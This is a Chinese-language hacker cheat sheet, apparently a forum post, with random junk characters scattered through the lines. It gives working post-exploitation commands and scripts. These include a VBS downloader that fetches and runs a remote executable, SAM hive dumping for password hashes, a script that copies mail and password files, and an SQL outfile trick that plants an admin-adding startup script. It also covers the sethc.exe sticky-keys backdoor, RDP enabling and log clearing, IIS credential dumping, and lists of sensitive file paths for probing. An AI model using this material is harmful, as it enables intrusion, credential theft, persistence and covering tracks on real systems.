" n8 w9 ]4 ]: S$ b3 B/ E& _0 E1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
{
" h; ^+ m9 c. m5 G& C. R注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
& O$ |* f. A3 `7 F7 t$ o' R若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
}  
# J+ `; x. g  m: a0 }
提权先执行systeminfo
token 漏洞补丁号 KB956572
$ u5 I( H2 b! ^  O1 P' _- |Churrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
2、收集系统信息的脚本  
for window：

@echo off
7 h$ H: B0 f1 Y! t3 M3 mecho #########system info collection
5 G' F/ I( x$ T( o$ Csysteminfo
ver
hostname
net user
4 M3 A7 G2 g* n8 W& Cnet localgroup
6 \$ w6 b4 W+ o1 \- \1 s6 G% A6 ~* inet localgroup administrators
net user guest
net user administrator

8 O( p# M7 ^% f; b7 W/ i& _echo #######at- with   atq#####
echo schtask /query
& U. p8 S, z5 L9 W* m8 G+ m
echo
* z' N7 d1 K+ v; Qecho ####task-list#############
/ N& I3 k& F6 T, B. o# ^. s1 [tasklist /svc
echo
echo ####net-work infomation
% q, ^# p  [  {) S8 o: _ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
, h4 c- u& b3 o8 {, S) \" S' Q. F: secho
echo #######service############
sc query type= service state= all
  j# \4 A% o/ Y0 m" Cecho #######file-##############
0 _, H5 V( b0 n( D/ A/ w- r3 qcd \
8 i* k# P1 A- U6 ftree -F
for linux：
( g1 s' M! x' V
; ~  z- p1 @$ L9 _#!/bin/bash

echo #######geting sysinfo####
+ E) r" i  `5 }' J2 P- J4 ?1 gecho ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
+ p* ]. g$ B3 G- k5 ycat /proc/meminfo
9 W5 N5 U* f$ h# m' f6 Lecho
cat /proc/cpuinfo
# R# k, f5 x) e3 Techo
0 G- R  ^6 L& T' H) d( G5 Yrpm -qa 2>/dev/null
######stole the mail......######
& ^7 Z+ G1 O# ]9 `0 d- Q$ O1 i' Tcp -a /var/mail /tmp/getmail 2>/dev/null
  K5 D* h8 w  q, O" ?' u
% ]7 k' \: ^" {3 s7 T; j! s" W
echo 'u'r id is' `id`
- E; X9 Q7 {" C: M9 q4 Aecho ###atq&crontab#####
atq
crontab -l
echo #####about var#####
/ f& `7 ?( ]" ?+ i$ xset
6 F* w! ?- `, G1 l$ Y* t0 @2 s
echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
9 ^$ m4 H% H( r+ ehostname
9 E$ G& X$ M  B; iipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh

7 G" Z" `' y2 l' Hecho ######service####
chkconfig --list

% `  E) y  u; D" ?for i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done
7 s* x( _1 C( E$ p9 q
locate passwd >/tmp/password 2>/dev/null
sleep 5
/ X5 M" T: D' Clocate password >>/tmp/password 2>/dev/null
1 D) Z! _+ y; V7 Wsleep 5
0 V* R9 Y" p! N0 O2 J) slocate conf >/tmp/sysconfig 2>dev/null
& B- i% e8 @" Z+ Gsleep 5
! r; T' r( j! {% c8 rlocate config >>/tmp/sysconfig 2>/dev/null
5 Z+ X( T$ g4 n, Isleep 5

###maybe can use "tree /"###
9 X* X/ i' ]* [1 p3 g7 A2 Cecho ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
) v* Y- @/ j/ z5 H5 @* q8 `3、ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
, @; Z; C1 d0 K! ]注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
5 s  Z. ?( l7 ]5 A" g! R) Xhash 抓完了记得把自己的账户密码改过来哦！
  g7 q; n6 T8 _% H据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
+ t7 o" O$ y4 r  G% R$ I——————————————
4、vbs 下载者
1
5 D$ {( ?3 R, D% }echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
: B9 I% y: y7 [! _echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
, N5 J- {( f7 I0 |5 @1 Cecho sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
" W+ `; W/ o7 E' m$ Qecho sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
: I) b& g' S5 j* ^: Y6 `* iecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
. ~& m( Q6 ?/ o+ d: @! C+ a( Xcftmon.vbs
) Z6 E- A1 T! c# {8 i5 E
0 l) v7 G4 x1 r2
On Error Resume Nextim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
. S* {7 {/ a0 R# gs1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
& e- X! G( _4 j/ z9 BSet sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

/ S$ X) D; [/ s0 Pcscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
" B. ?7 ~& b/ _3 m——————————————————
/ J9 l! f6 C6 v1 Q. }' ^5、
1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
$ ]8 @- e4 ~/ z/ a, F( ?* _" K2.开启XP&2003终端服务
6 V# j4 E$ o- y0 w7 H" UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2 j& M$ x% H7 w! M, F5 ?3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
$ S) i3 s" k& @# j% n- J————————————————
6、create table a (cmd text);
9 V9 E( G+ X/ x. \0 ^- minsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
————————————————————
2 H* O5 X+ y/ V7 E, p7 w0 ^7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
& P3 S, P, q5 d# J" s$ n_____
8、for /d %i in (d:\freehost\*) do @echo %i

' ~! O! m' ?' O$ y5 E列出d的所有目录
9 H: z6 g  ]: f. t( o7 d5 p0 W# L  
# \" I$ x, B5 }2 v  for /d %i in (???) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的打出来
" F; N4 O# T. B  o) y
" X6 E. f0 X% R- ]" B$ ^: q2.for /r %i in (*.exe) do @echo %i
; H! n+ }; n+ b  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
* u1 Y9 R8 t% Z0 n7 r& i$ O2 P
3.for /f %i in (c:\1.txt) do echo %i
, W6 L/ H2 d  J% D4 A6 [  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
- a4 `+ G) b; a* p! c
  delims=后的空格是分隔符 tokens是取第几个位置
——————————
5 e. C1 k* C8 Z" I●注册表:
4 A9 L5 M9 q' P3 [, H1.Administrator注册表备份:
, Z* Q% K& z1 Q5 Breg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
3 _& Q3 w2 V4 T6 T
2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
: b# J7 t  _; y) b" @& U6 n- U修改PortNumber.

0 S% A# M3 P" z. u% y, I3.清除3389登录记录:
/ J) C% N& h& X. [% nreg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f

" X6 r% B& w7 U6 R  e4.Radmin密码:
5 {! n" c3 p2 ?: l: h; B/ W( F/ kreg export HKLM\SYSTEM\RAdmin c:\a.reg

5.禁用TCP/IP端口筛选(需重启):
5 B5 R) n/ |  \! [% A9 e+ `1 M' vREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
, N) H0 V1 b. p4 q
6.IPSec默认免除项88端口(需重启):
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
或者
5 I0 X) ]. {8 [+ l. {% {netsh ipsec dynamic set config ipsecexempt value=0
. W+ a8 H  S9 O) d
7.停止指派策略"myipsec":
6 n; u# f4 c1 ^$ X4 _) j" K8 H% @1 Wnetsh ipsec static set policy name="myipsec" assign=n
! `1 Q$ B4 @6 B- S" k, E0 D
8.系统口令恢复LM加密:
+ y: i  h& f5 l1 jreg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
, V3 S' Y3 M4 i* b: X6 h! N6 e
5 \/ T( a7 c, T+ A9.另类方法抓系统密码HASH
8 z! C# K. K- X0 e$ ?; u; q  M9 qreg save hklm\sam c:\sam.hive
0 W: f) B' j. _( M" [  c6 creg save hklm\system c:\system.hive
1 I+ k0 j8 F% L9 I& [- l) f9 freg save hklm\security c:\security.hive
, ?* x4 r% P) M9 {5 o" |/ ]
10.shift映像劫持
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
4 i: ^' Y% Y3 X, I4 P$ A& _; F* I! e9 n
4 [; y6 s( C4 E0 g3 [. j4 creg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
-----------------------------------
) z, m/ W1 b; z; Q星外vbs(注：测试通过，好东西）
1 j, w: \- {8 v& xSet ObjService=GetObject("IIS://LocalHost/W3SVC")
# N3 N; n4 @/ e  ?5 v/ LFor Each obj3w In objservice
- K& Z3 \9 x: g/ g: Y1 d5 [childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
if IsNumeric(childObjectName)=true then
: j% ~5 u2 d1 u" [* n* b+ b, nset IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
exit for
msgbox("error!")
$ A- k) ]7 ^- t# jwscript.quit
6 _  Y6 F2 |3 {" w# o! \' C- yend if
( J3 ?* i0 j9 m' u: W% [$ \: \* Bserverbindings=IIS.serverBindings
ServerComment=iis.servercomment
, o3 h9 F3 Y- b- p$ H8 U$ y; u  Vset IISweb=iis.getobject("IIsWebVirtualDir","Root")
9 [% x7 r0 j" \4 |; tuser=iisweb.AnonymousUserName
% Z5 i% \+ }7 f7 C5 P* b/ \- Rpass=iisweb.AnonymousUserPass
- n" q3 T  y  J2 d: Rpath=IIsWeb.path
list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
end if
' d/ ?: B  V& J% B+ `3 P+ O; @4 e* pNext
wscript.echo list
# r3 i, l. `0 N: o  T2 N& [Set ObjService=Nothing
1 s# H& N- p6 W' m' N+ l: x9 Rwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
/ A" s8 F, f8 K0 t9 PWScript.Quit
3 u) r' x& h: O" D5 q2 y4 D3 o复制代码
. i7 |& S! E8 q& S- i" q% Z----------------------2011新气象，欢迎各位补充、指正、优化。----------------
1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
3 Z% M# W5 x- J7 i. }将folder.htt文件，加入以下代码：
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
1 Z+ H. w2 K; Z( b& q/ \复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
: X2 I# F$ P, d  X3 y7 m) Pasp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
url=request.severvariables("url")
9 b9 P# h* l5 m9 L% y: z 这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
url=request.severvariables("path_info")
: {6 @; K- {+ r, F. i, a path_info可以直接呈现虚拟路径 顺利解析gif大马

* ~, O" S) _) K% s9 a, l==============================================================
" D7 p& D6 f$ rLINUX常见路径：

/etc/passwd
1 p4 ^: f( M! j, i+ ]. y/etc/shadow
/etc/fstab
* m# P: v3 z* @& n* L/etc/host.conf
# \1 J& Z: ?5 Q! _6 A% j& d( ?/etc/motd
# b! M. `  X% V/etc/ld.so.conf
/var/www/htdocs/index.php
' s- [2 }3 C% o+ c/var/www/conf/httpd.conf
. A4 N+ Z/ ?: |4 e/var/www/htdocs/index.html
/var/httpd/conf/php.ini
3 o# u) _8 c& \7 z( m- ~& i/var/httpd/htdocs/index.php
8 M& \. f7 ?; D/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
$ ]0 Q2 P9 v. L" z* \; H/var/httpd/conf/php.ini
/var/www/index.html
# ~, {( o5 w! }/var/www/index.php
! E$ d$ }" d6 b( k: r" Y/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
$ W9 X; j7 A/ Y, `. I/opt/www/htdocs/index.html
" ~( x6 g  P' U9 w9 d  f  x- Q/usr/local/apache/htdocs/index.html
& |  W8 ^: b3 l1 V. x* f/usr/local/apache/htdocs/index.php
! a2 ]9 {" S  }: G" Y  h( B8 d: {/usr/local/apache2/htdocs/index.html
! V, L! v* Y% t3 ]' a" E, d/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
9 }% J( `9 g4 v- r+ w1 N& h/etc/httpd/htdocs/index.php
& T" _/ k& a8 E% c# }6 q/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
6 r; e- o) P6 r- b/www/php/php.ini
/www/php4/php.ini
& R7 ~! {/ |% F) M* ^; p/www/php5/php.ini
6 k+ M9 Q2 _4 s' Q7 ^7 j3 w/www/conf/httpd.conf
$ Q0 P1 e1 W1 c3 t, j. D/www/htdocs/index.php
) k8 K# a- n2 ~/www/htdocs/index.html
$ |, K0 T; Q' N- W  ?% O* o* Y/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
* n4 x$ }$ i4 W! M+ U6 l/etc/apache/apache.conf
5 t: @2 l+ h" D" S7 c/etc/apache2/apache.conf
2 y4 V* C" Y' E4 i( u; e! S, K/etc/apache/httpd.conf
/etc/apache2/httpd.conf
$ Z" k/ F/ \! a5 C2 ?: r; |9 c/etc/apache2/vhosts.d/00_default_vhost.conf
. R- ]* h8 w6 O  {# ~/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
# F$ o) z; D% R' J+ O/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
" V% q0 E( S. n! K3 P- h# m: P2 @$ o/etc/httpd/logs/error_log
* y" H( w) C  C- U  |+ a( ]$ q/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
6 F/ y  y$ Z* l4 u& x7 Y/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
+ R: v4 z1 Z3 ^1 L" R' j- n/var/log/apache/error.log
, T1 n  Y- s/ B& k' G% R; T: {/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
! l% J" M. ~/ v# ^- d: u0 k/var/log/apache2/error.log
/var/log/apache2/access_log
5 {8 C$ j' Z% E/var/log/apache2/access.log
/var/www/logs/error_log
- [1 F/ I/ B( e( I! A0 v" d" W/var/www/logs/error.log
/var/www/logs/access_log
1 C' }; j% ]. I5 q/var/www/logs/access.log
. @. v0 O) ?% L" L3 z/usr/local/apache/logs/error_log
6 g4 q: {- y& m: H/usr/local/apache/logs/error.log
+ O, m; e4 C+ r' ]+ p/ c& D6 ^/usr/local/apache/logs/access_log
4 O& _: P' H% ]- y; _+ h/usr/local/apache/logs/access.log
/var/log/error_log
% m* l- b' V7 u; {/var/log/error.log
/var/log/access_log
  b) L4 ^' D4 x/ S1 u4 o) W1 l/var/log/access.log
. p6 {# g" F$ [( a* ?& u* C9 O6 A8 Z/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
3 X0 ]0 m' q- l8 R" Z" p/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
* }3 `9 E( D# Q; b1 Y/usr/lib/php.ini
1 `: K& J; s$ y/ A" R$ h/usr/lib/php/php.ini
9 n  n) f  }9 G* O0 j+ e% m/usr/local/etc/php.ini
/usr/local/lib/php.ini
9 @1 r- ~4 q1 _/usr/local/php/lib/php.ini
/ s' x& I6 y3 [, y# j/usr/local/php4/lib/php.ini
) m/ D+ X9 N3 F0 e/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
# x) Y7 N. H8 F* O; U2 e/usr/local/php5/lib/php.ini
1 j! m) P. _% i* H4 i1 Y/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
% H& V* d* M0 t" Y1 l" a; }. |6 I/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/ X2 J* ^6 X( T4 P4 R/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
, E1 C% [0 e1 c. M/etc/php/php.ini
/etc/php/php4/php.ini
& J( D7 z2 d. l- M4 A/etc/php/apache/php.ini
/etc/php/apache2/php.ini
; G& k5 g& s; l- k( z: x/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/ q, V, e5 }" u- j' x# R/opt/xampp/etc/php.ini
. ^* k& u8 X4 j& k/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
% ~  B- e+ T  g/etc/php/cgi/php.ini
; E4 f( M# p/ ^5 W/etc/php4/cgi/php.ini
( a7 Y4 m8 a/ N; N, r6 o/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
3 L7 [" g" D" |5 c, K" k& G2 n/apache/php/php.ini
: t9 M; S# M2 M; B: b+ e- n/ O1 n/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
3 {: M5 c' q1 C. P. {/home/bin/stable/apache/php.ini
" G: h9 D! ]: F/var/log/mysql/mysql-bin.log
/var/log/mysql.log
, _  A9 x. B) {/var/log/mysqlderror.log
, P" c. A0 y" g4 Y/var/log/mysql/mysql.log
9 l! ?. P+ x  S) \0 X! R/ ]/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
6 `; P+ ~' b" {/ Q/usr/local/mysql/my.cnf
1 a; V+ r* ]! p3 B, `# }/usr/local/mysql/bin/mysql
+ _* m: l# t6 `8 W0 u6 w1 x/etc/mysql/my.cnf
/ Q; b! g) F9 Z8 ?1 M" ~/etc/my.cnf
% U0 U. l7 V! @" K; E# D/usr/local/cpanel/logs
7 P, r0 ~) o2 X5 h4 s1 P1 n7 s/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
5 I% u& q% z9 Z  n+ q% Z/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
7 w" m5 E9 @: s9 f/ z2 b/usr/local/cpanel/logs/login_log
/ c  b; c! l) h! ^/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
9 F( O# Z% M) h. M; S5 q) m
2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
: n; j. C7 T$ G; x  u; ?# h
1 h; {5 A: @% C# ~; Uc:\windows\php.ini
4 p" h+ }: y# f- ^3 oc:\boot.ini
3 k$ f" i+ y& i/ c, n6 G2 ^c:\1.txt
# a2 L$ T5 {! T/ [c:\a.txt
4 V! G; q6 X& o' Y5 {, f% {2 M
5 C3 f' w$ z/ |/ x. |  D! Yc:\CMailServer\config.ini
  C( w$ q; p5 ?' @. gc:\CMailServer\CMailServer.exe
/ I8 B/ {4 g$ {* J; ?c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
1 }8 J1 r: r6 n& z' l% k; J% ^c:\program files\CMailServer\WebMail\index.asp
; G( Y* M# k1 y) M7 lC:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
* U3 r% C! }% X9 B$ l1 bC:\WINDOWS\FreeHost32.dll
: S+ Y& u, \. D% b' tC:\WINDOWS\7i24iislog4.exe
/ j5 X. ~: h" M# aC:\WINDOWS\7i24tool.exe

  _8 _- D! t& Z. ?; k/ Wc:\hzhost\databases\url.asp
7 w% }: R+ J$ v* L) K  w# A
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

; x/ ?" I4 I. ?. l$ cC:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
: F! }# j+ Y2 w5 wC:\WINDOWS\web.config
8 h# h/ ~; z" N0 Z& uc:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
5 y0 f! w8 D0 X2 ac:\web\index.asp
c:\www\index.asp
8 `5 m5 R, D3 I' v+ tc:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
: N- t5 K8 N$ U9 p' p9 a8 m! cc:\WWWROOT\index.php
9 p. r- B! N! o6 k4 g. ~5 oc:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
0 q2 {1 @. s: D1 J( k1 _c:\website\default.html
c:\web\default.asp
0 N1 u; K& P, B# h; J9 Y! S% zc:\www\default.asp
; f3 x% L# b4 q+ Kc:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
; T1 w( R' ?4 u$ v5 ]& pc:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
( D5 Q7 M8 Q# m: x3 J% ?- P$ q5 o5 @c:\windows\notepad.exe
6 ?0 O3 y# B6 J3 A4 d' A. V- Bc:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
- r% ]/ K- l+ _5 h+ Z6 NC:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
$ @' O. C; }& e0 h3 bC:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
* p- M, o# ^2 {6 B4 qC:\Program Files\360\360Safe\360safe.exe
0 J& m" F* |: QC:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
- O8 @% K8 F* M, DC:\Documents and Settings\All Users\Start Menu\desktop.ini
1 R  R; W" k, w& J# ZC:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
! G3 H/ [  }  E$ cC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
! Q; L! @! {1 p1 R  p) OC:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
% e2 i" C6 h( A" SE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
2 G+ u# z# Z! t' w. }C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
, B2 T- y; D! N; HC:\Program Files\Symantec\SYMEVENT.INF
7 g5 \3 ~7 c7 D; ^8 OC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
9 V& ~5 A. L) l8 h( v/ ^5 X8 Z9 QC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
: I2 I& P' G' _C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
( ~3 F1 v8 o7 rC:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
, H* y: _% ?' q% M" NC:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
! Z5 C' u6 n+ q- P$ U9 i9 n2 [* l2 |C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
9 z; c1 k6 d1 n8 Y6 u' \& RC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
5 m- x- C7 h: u( M0 n( h. Fc:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
9 s, i9 I9 o) y& QC:\Program Files\Oracle\oraconfig\Lpk.dll
3 ?; ?( N/ e+ A7 x4 A7 iC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
- U  B9 a% }' P/ ~C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
. f' F) r; l1 N4 n& [1 y+ v* @C:\WINDOWS\system32\inetsrv\MetaBase.xml
# Q$ b- J3 X& v8 f7 W# l+ L) ^4 hC:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
9 N0 Z# ]- |; {6 Hc:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
) D: \9 v: V1 I! ]/ h9 s$ pC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
3 o: h( q- b: b$ X; Sc:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
$ j' ~: Y) T& C- ^$ bc:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
1 \& B  B( E% L/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
4 h# e: j7 s) [7 Ec:\Program Files\QQ2007\qq.exe
0 v! c/ Y! I  A4 yc:\Program Files\Tencent\qq\User.db
  n" F3 w# n$ O8 p$ h/ A, Yc:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
